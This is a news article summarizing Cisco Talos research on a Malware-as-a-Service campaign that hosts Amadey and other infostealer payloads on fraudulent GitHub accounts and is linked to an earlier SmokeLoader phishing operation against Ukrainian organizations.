A newly uncovered Malware-as-a-Service (MaaS) scheme is leveraging GitHub repositories to disseminate various infostealer families. This discovery was made by cybersecurity analysts at Cisco Talos, who released their findings today. The report details how the threat actors are utilizing the Amadey bot to directly source malware from public GitHub repositories onto compromised systems.
This operation emerged in April 2025, although its activities can be traced back to at least February of the same year. This timeframe coincides with a phishing campaign targeting Ukrainian organizations through SmokeLoader emails. Analysts at Talos identified significant similarities in tactics and infrastructure between this earlier campaign and the new Amadey-driven operation, suggesting a potential connection between the two.
A particularly concerning aspect of this operation is the exploitation of GitHub. The attackers established fraudulent accounts that functioned as open directories, where they hosted payloads, tools, and Amadey plugins. By taking advantage of GitHub’s widespread credibility within corporate environments, they likely bypassed numerous standard web filters that could thwart access to malicious domains.
Other accounts, such as “Milidmdds” and “DFfe9ewf,” employed similar strategies, though “DFfe9ewf” appeared to be more experimental in nature. Collectively, these accounts hosted various scripts, loaders, and binaries from multiple infostealer families, including Amadey, Lumma, Redline, and AsyncRAT.
Amadey itself is not a new entrant in the malware landscape; it initially surfaced in 2018 on Russian-speaking forums, marketed for around $500. It has been utilized by multiple groups for creating botnets and deploying additional malware. The malware is capable of harvesting system information, downloading supplementary tools, and expanding its functionalities through plug-ins. Despite its common use as a downloader, its adaptable architecture can pose a more significant risk depending on the configuration employed by its operators.
The technical associations between this campaign and the prior SmokeLoader operation revolve around a loader named “Emmenhtal.” First documented in 2024 by Orange Cyberdefense, Emmenhtal is a multi-layer downloader that obscures its final payload through layers of encryption. Talos discovered that various Emmenhtal variants were utilized in the phishing campaign targeting Ukrainian entities, as well as within scripts found on the fraudulent GitHub accounts.
Work.js” and “Putikatest.js,” bore striking similarities to those identified in the earlier campaign. The only distinctions were minor alterations in function names and final download locations. Rather than targeting SmokeLoader, these scripts fetched Amadey, PuTTY executables, and remote access tools like AsyncRAT.
The exploitation of GitHub was not restricted to JavaScript droppers. Talos also identified a Python script named “checkbalance.py,” which masqueraded as a cryptocurrency tool. This script secretly decoded and executed a PowerShell command that fetched Amadey from a known command-and-control server. Notably, it displayed an error message in broken Cyrillic, suggesting its origins or target audience.
